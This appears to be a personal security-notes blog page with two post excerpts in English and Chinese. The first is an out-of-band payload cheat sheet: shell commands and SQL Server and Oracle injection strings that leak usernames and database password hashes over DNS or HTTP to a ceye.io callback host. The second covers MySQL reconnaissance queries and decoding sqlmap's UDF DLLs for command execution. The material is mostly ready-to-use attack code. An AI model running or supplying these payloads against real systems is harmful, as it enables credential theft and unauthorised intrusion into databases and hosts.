Notes Site.

Out-of-Band Payload

post @ 2023-09-10

0x00 Command Execution

i. nix:

1
2
curl http://ip.port.b182oj.ceye.io/`whoami`
ping `whoami`.ip.port.b182oj.ceye.io

ii. windows

1
ping %USERNAME%.b182oj.ceye.io

0x01 SQL Injection

i. SQL Server

1
2
3
4
5
6
7
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.ip.port.b182oj.ceye.io';
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');

ii. Oracle

1
2
3
4
5
SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;
Read More

MySQL UDF

post @ 2023-08-20

MySQL UDF

(user defined function)⽤户⾃定义函数

版本 路径
<=5.1 c:\windows\system32
>5.1 lib\plugin(该目录默认不存在)
不限 /usr/lib64/mysql/plugin(Linux)

信息收集

1
2
3
4
select verison();
select user();
select @@basedir;
select @@plugin_dir;

windows

条件:MySQL账号密码,secure_file_priv=""

sqlmap/data/udf/mysql 目录下,在Windows目录中有32位和64位的dll文件(MySQL位数),文件夹中的dll文件是通过异或编码的,可以使用 sqlmap/extract/cloak.py 进行解码

1
python /sqlmap/extra/cloak/cloak.py -d -i /sqlmap/udf/mysql/windows/64/lib_mysqludf_sys.dll

注意:需要创建.dll文件中存在的函数,可以使用十六进制编辑器打开.dll文件,查看可以被创建的函数。

Read More
⬆︎TOP